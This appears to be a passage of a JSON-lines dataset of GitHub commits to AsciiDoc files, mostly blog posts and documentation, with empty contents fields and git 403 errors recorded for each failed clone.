elasticsearch,Uiho\/elasticsearch,qwerty4030\/elasticsearch,MichaelLiZhou\/elasticsearch,MetSystem\/elasticsearch,camilojd\/elasticsearch,qwerty4030\/elasticsearch,AndreKR\/elasticsearch,palecur\/elasticsearch,mgalushka\/elasticsearch,Rygbee\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,achow\/elasticsearch,liweinan0423\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra5-rc,wbowling\/elasticsearch,cnfire\/elasticsearch-1,mmaracic\/elasticsearch,nellicus\/elasticsearch,masterweb121\/elasticsearch,sc0ttkclark\/elasticsearch,davidvgalbraith\/elasticsearch,Uiho\/elasticsearch,franklanganke\/elasticsearch,tebriel\/elasticsearch,18098924759\/elasticsearch,avikurapati\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mbrukman\/elasticsearch,hydro2k\/elasticsearch,franklanganke\/elasticsearch,Siddartha07\/elasticsearch,slavau\/elasticsearch,MaineC\/elasticsearch,onegambler\/elasticsearch,iacdingping\/elasticsearch,davidvgalbraith\/elasticsearch,camilojd\/elasticsearch,maddin2016\/elasticsearch,apepper\/elasticsearch,adrianbk\/elasticsearch,MetSystem\/elasticsearch,jango2015\/elasticsearch,masterweb121\/elasticsearch,mmaracic\/elasticsearch,ImpressTV\/elasticsearch,nrkkalyan\/elasticsearch,trangvh\/elasticsearch,andrestc\/elasticsearch,naveenhooda2000\/elasticsearch,cnfire\/elasticsearch-1,baishuo\/elasticsearch_v2.1.0-baishuo,MisterAndersen\/elasticsearch,scottsom\/elasticsearch,spiegela\/elasticsearch,ESamir\/elasticsearch,kalburgimanjunath\/elasticsearch,rmuir\/elasticsearch,achow\/elasticsearch,iamjakob\/elasticsearch,mortonsykes\/elasticsearch,awislowski\/elasticsearch,MetSystem\/elasticsearch,jprante\/elasticsearch,jbertouch\/elasticsearch,truemped\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,bestwpw\/elasticsearch,mjason3\/elasticsearch,mgalushka\/elasticsearch,diendt\/elasticsearch,Brijeshrpatel9\/elasticsearch,zhiqinghuang\/elasticsearch,adrianbk\/elasticsearch,MjAbuz\/elasticsearch,areek\/elasticsearch,jpountz\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch,tahaemin\/elasticsearch,wuranbo\/elasticsearch,qwerty4030\/elasticsearch,wittyameta\/elasticsearch,socialrank\/elasticsearch,ESamir\/elasticsearch,kunallimaye\/elasticsearch,iamjakob\/elasticsearch,markharwood\/elasticsearch,knight1128\/elasticsearch,vietlq\/elasticsearch,jeteve\/elasticsearch,slavau\/elasticsearch,karthikjaps\/elasticsearch,gingerwizard\/elasticsearch,
adrianbk\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,rhoml\/elasticsearch,gmarz\/elasticsearch,yynil\/elasticsearch,truemped\/elasticsearch,caengcjd\/elasticsearch,lydonchandra\/elasticsearch,rmuir\/elasticsearch,mikemccand\/elasticsearch,hafkensite\/elasticsearch,karthikjaps\/elasticsearch,hafkensite\/elasticsearch,himanshuag\/elasticsearch,tahaemin\/elasticsearch,petabytedata\/elasticsearch,weipinghe\/elasticsearch,btiernay\/elasticsearch,kunallimaye\/elasticsearch,areek\/elasticsearch,xuzha\/elasticsearch,tebriel\/elasticsearch,fforbeck\/elasticsearch,btiernay\/elasticsearch,C-Bish\/elasticsearch,pranavraman\/elasticsearch,MisterAndersen\/elasticsearch,Helen-Zhao\/elasticsearch,palecur\/elasticsearch,polyfractal\/elasticsearch,ImpressTV\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,lmtwga\/elasticsearch,schonfeld\/elasticsearch,njlawton\/elasticsearch,girirajsharma\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,cwurm\/elasticsearch,tkssharma\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,mnylen\/elasticsearch,mapr\/elasticsearch,andrejserafim\/elasticsearch,himanshuag\/elasticsearch,dongjoon-hyun\/elasticsearch,masterweb121\/elasticsearch,jpountz\/elasticsearch,fernandozhu\/elasticsearch,djschny\/elasticsearch,strapdata\/elassandra-test,Collaborne\/elasticsearch,lzo\/elasticsearch-1,clintongormley\/elasticsearch,sdauletau\/elasticsearch,pranavraman\/elasticsearch,dpursehouse\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,kalimatas\/elasticsearch,andrejserafim\/elasticsearch,nezirus\/elasticsearch,alexshadow007\/elasticsearch,weipinghe\/elasticsearch,mcku\/elasticsearch,areek\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,wimvds\/elasticsearch,nknize\/elasticsearch,mm0\/elasticsearch,yanjunh\/elasticsearch,umeshdangat\/elasticsearch,ivansun1010\/elasticsearch,mbrukman\/elasticsearch,springning\/elasticsearch,iamjakob\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,geidies\/elasticsearch,yynil\/elasticsearch,zkidkid\/elasticsearch,petabytedata\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,franklanganke\/elasticsearch,kaneshin\/elasticsearch,KimTaehee\/elasticsearch,vietlq\/elasticsearch,petabytedata\/elasticsearch,wenpos\/elasticsearch,palecur\/elasticsearch,Charlesdong\/elasticsearch,ckclark\/elasticsearch,JervyShi\/elasticsearch,nrkkalyan\/elasticsearch,vroyer\/elassandra,queirozfcom\/elasticsearch,ulkas\/elasticsearch,andrejserafim\/elasticsearch,JervyShi\/elasticsearch,lmtwga\/elasticsearch,Brijeshrpatel9\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,ulkas\/elasticsearch,xuzha\/elasticsearch,mikemccand\/elasticsearch,caengcjd\/elasticsearch,drewr\/elasticsearch,himanshuag\/elasticsearch,drewr\/elasticsearch,masaruh\/elasticsearch,mm0\/elasticsearch,F0lha\/elasticsearch,socialrank\/elasticsearch,Charlesdong\/elasticsearch,girirajsharma\/elasticsearch,socialrank\/elasticsearch,clintongormley\/elasticsearch,dpursehouse\/elasticsearch,clintongormley\/elasticsearch,ZTE-PaaS\/elasticsearch,xuzha\/elasticsearch,scorpionvicky\/elasticsearch,sdauletau\/elasticsearch,pranavraman\/elasticsearch,strapdata\/elassandra,myelin\/elasticsearch,nrkkalyan\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,polyfractal\/elasticsearch,socialrank\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,ricardocerq\/elasticsearch,LewayneNaidoo\/elasticsearch,cn
fire\/elasticsearch-1,sreeramjayan\/elasticsearch,masaruh\/elasticsearch,obourgain\/elasticsearch,ImpressTV\/elasticsearch,andrestc\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,KimTaehee\/elasticsearch,wangtuo\/elasticsearch,yongminxia\/elasticsearch,mbrukman\/elasticsearch,brandonkearby\/elasticsearch,areek\/elasticsearch,kingaj\/elasticsearch,infusionsoft\/elasticsearch,knight1128\/elasticsearch,sneivandt\/elasticsearch,kingaj\/elasticsearch,myelin\/elasticsearch,jchampion\/elasticsearch,jimczi\/elasticsearch,ivansun1010\/elasticsearch,franklanganke\/elasticsearch,iacdingping\/elasticsearch,socialrank\/elasticsearch,MisterAndersen\/elasticsearch,achow\/elasticsearch,karthikjaps\/elasticsearch,diendt\/elasticsearch,sneivandt\/elasticsearch,awislowski\/elasticsearch,kalburgimanjunath\/elasticsearch,Rygbee\/elasticsearch,PhaedrusTheGreek\/elasticsearch,MjAbuz\/elasticsearch,polyfractal\/elasticsearch,gingerwizard\/elasticsearch,franklanganke\/elasticsearch,markharwood\/elasticsearch,tkssharma\/elasticsearch,ImpressTV\/elasticsearch,ESamir\/elasticsearch,dongjoon-hyun\/elasticsearch,trangvh\/elasticsearch,wbowling\/elasticsearch,rento19962\/elasticsearch,18098924759\/elasticsearch,beiske\/elasticsearch,elancom\/elasticsearch,lzo\/elasticsearch-1,weipinghe\/elasticsearch","old_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc1491d3a740b0acee4e84633a6bc339b4c96327","subject":"y2b create post MAG 2 Gun Controller for XBOX 360, PS3 \\u0026 PC (CES 2013)","message":"y2b create post MAG 2 Gun Controller for XBOX 360, PS3 \\u0026 PC (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-12-MAG-2-Gun-Controller-for-XBOX-360-PS3-u0026-PC-CES-2013.adoc","new_file":"_posts\/2013-01-12-MAG-2-Gun-Controller-for-XBOX-360-PS3-u0026-PC-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d92f30bd51bdd7cefe898e3b17d45d01c7c57f71","subject":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","message":"Update 2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_file":"_posts\/2016-04-12-Eficiencia-de-algoritmos-parte-I-I-I-Algoritmos-voraces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d7f041892b106c3555dd43f1ad12072005aa33d","subject":"Added a missing README for metrics","message":"Added a missing README for 
metrics\n","repos":"vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples","old_file":"metrics-examples\/README.adoc","new_file":"metrics-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"187ff6c048f2ecb71936596534a773cd6dba16ed","subject":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","message":"Update 2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","repos":"Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_file":"_posts\/2015-08-09-Bienvenidos-al-Curso-de-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Desarrollo-FullStack\/Desarrollo-FullStack.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b748a1815206b1320e971eb8322b2ffbfa3ff492","subject":"Importing CIP2014-03-12","message":"Importing CIP2014-03-12\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2014-03-12-require-connected-patterns.asciidoc","new_file":"cip\/CIP2014-03-12-require-connected-patterns.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c01273c522c07aeab6ce41008ce0530ba4962a76","subject":"Update 2015-12-05-ssh-S-F-T-P.adoc","message":"Update 2015-12-05-ssh-S-F-T-P.adoc","repos":"MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io,MichaelIT\/MichaelIT.github.io","old_file":"_posts\/2015-12-05-ssh-S-F-T-P.adoc","new_file":"_posts\/2015-12-05-ssh-S-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MichaelIT\/MichaelIT.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94bf33049eef4fcc6a50e565882cc05270c74823","subject":"Update 2015-02-20-Hi.adoc","message":"Update 2015-02-20-Hi.adoc","repos":"ron194\/ron194.github.io,ron194\/ron194.github.io,ron194\/ron194.github.io","old_file":"_posts\/2015-02-20-Hi.adoc","new_file":"_posts\/2015-02-20-Hi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ron194\/ron194.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0033f1f4f3e33512615cc18580d84ce3cb5c0ef0","subject":"Update 2017-09-22-aa.adoc","message":"Update 
2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfd3c5cb66bcc7b4058b6afabf304f8715c877be","subject":"Update 2016-09-innovation-engineer-aruaru.adoc","message":"Update 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_file":"_posts\/2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf1936175153619c537eb8d8bd746bac808fa261","subject":"Update 2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","message":"Update 2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","new_file":"_posts\/2017-04-15-Calculate-Minimal-Bounding-Sphere-of-Frustum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d98906a4d7440aefb3f576ef63b35e0fd2116534","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65c31f892b4c17e8981d51f583a3064d5460dc3c","subject":"spelling","message":"spelling","repos":"ePages-de\/rnd-microservices-handson,ePages-de\/rnd-microservices-handson,ePages-de\/rnd-microservices-handson,ePages-de\/rnd-microservices-handson","old_file":"catalog\/src\/docs\/asciidoc\/resources\/pizza.adoc","new_file":"catalog\/src\/docs\/asciidoc\/resources\/pizza.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ePages-de\/rnd-microservices-handson.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94a8c7d57ca96f4915ff88e9e2e24bea36f86596","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 
2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"149418c142c27f4d3a91d7a61b93fbff5c927af8","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00cd5c99684a279fd5588b90e8bd45ac6a6eec5c","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9ed787531851f6d841a2b458c17e0180141638c","subject":"Improve text for integrating with Cloudera Manager","message":"Improve text for integrating with Cloudera Manager\n\nChange-Id: I2563252636191b35103c3d01ffc31f0924ea28b1\nSigned-off-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/7523\nTested-by: Kudu Jenkins\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25c56f7aa0e1652d565ed372b4b10cf99b733141","subject":"New strerror document.","message":"New strerror 
document.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/nng_strerror.adoc","new_file":"docs\/nng_strerror.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eae6baadde499437cb8342fa0d8aabf3f707fef6","subject":"Update 2015-04-20-Reception-et-montage-des-pieces.adoc","message":"Update 2015-04-20-Reception-et-montage-des-pieces.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-04-20-Reception-et-montage-des-pieces.adoc","new_file":"_posts\/2015-04-20-Reception-et-montage-des-pieces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34dab8da2c24c4e24bea2efe407ff81d4c396e13","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b96bacfcaf7d34a44ff797cf03c94554cff5aa1","subject":"Update 2017-10-02-Kisa-Kisa-2.adoc","message":"Update 2017-10-02-Kisa-Kisa-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5872654a2d4a0527e0bf1d50b6eb501aa06576b3","subject":"Add initial document on library usage.","message":"Add initial document on library usage.\n","repos":"Yubico\/yubikey-manager,Yubico\/yubikey-manager","old_file":"doc\/Library_Usage.adoc","new_file":"doc\/Library_Usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"96b4cb0c53074a7b589efedc8c1550dc42fa1df0","subject":"Update 2016-07-16-Mormans.adoc","message":"Update 2016-07-16-Mormans.adoc","repos":"gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io,gorjason\/gorjason.github.io","old_file":"_posts\/2016-07-16-Mormans.adoc","new_file":"_posts\/2016-07-16-Mormans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gorjason\/gorjason.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"835c84e7eb07e970362677fae4b0f61a6ec3210e","subject":"Update 2016-08-26-dfsdfsd.adoc","message":"Update 
2016-08-26-dfsdfsd.adoc","repos":"apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io,apalkoff\/apalkoff.github.io","old_file":"_posts\/2016-08-26-dfsdfsd.adoc","new_file":"_posts\/2016-08-26-dfsdfsd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apalkoff\/apalkoff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"568e834740dc62423941ec1d6dba8f880773281a","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d424416779d136d15b02e562f723851c31eb1528","subject":"Update 2016-10-21-opensource-paas.adoc","message":"Update 2016-10-21-opensource-paas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-21-opensource-paas.adoc","new_file":"_posts\/2016-10-21-opensource-paas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf23c634b357f44aadb0e1664834af6cb80ae96d","subject":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","message":"Publish 2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_file":"2017-0331-Die-sechs-Vermeidungen-des-Menschen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f54fa5387cb8dc09bc9e8c69bbca28f4b808b5f","subject":"Hawkular Metrics 0.14.0 - Release","message":"Hawkular Metrics 0.14.0 - 
Release\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/03\/29\/hawkular-metrics-0.14.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/03\/29\/hawkular-metrics-0.14.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7bb417c6cf6f69f93405545abbe3b1cd31bd932c","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d98c824c7e1837a24110b11f18264e2feb2775d","subject":"y2b create post Wireless HDMI - Does It Suck?","message":"y2b create post Wireless HDMI - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-22-Wireless-HDMI--Does-It-Suck.adoc","new_file":"_posts\/2017-03-22-Wireless-HDMI--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac24be9f2106d949c2331e7d4115ccddcd1b041e","subject":"Update 